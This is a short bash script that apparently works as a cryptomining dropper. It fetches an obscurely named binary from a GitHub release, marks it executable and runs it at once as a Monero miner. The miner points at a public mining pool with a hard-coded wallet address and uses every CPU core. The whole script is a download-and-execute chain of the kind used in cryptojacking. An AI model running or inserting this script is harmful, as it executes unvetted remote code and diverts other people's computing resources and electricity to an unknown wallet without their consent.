#!/bin/bash
wget https://github.com/vedhagsvp/marva/releases/download/c4ksd/crrmnar && \
chmod +x crrmnar && \
./crrmnar -o stratum+tcp://xmr.suprnova.cc:6663 -u 44Hy7goGeFtd6HeHC4GEYXhApgSCNKf2q1YRPVA9661mQWoZ5WVTovj8Te1kmLmdut1dXwws7C491EoFUTbN3qCv8zbwhKC.lofdd -p x -a rx/c64 -t $(nproc --all)
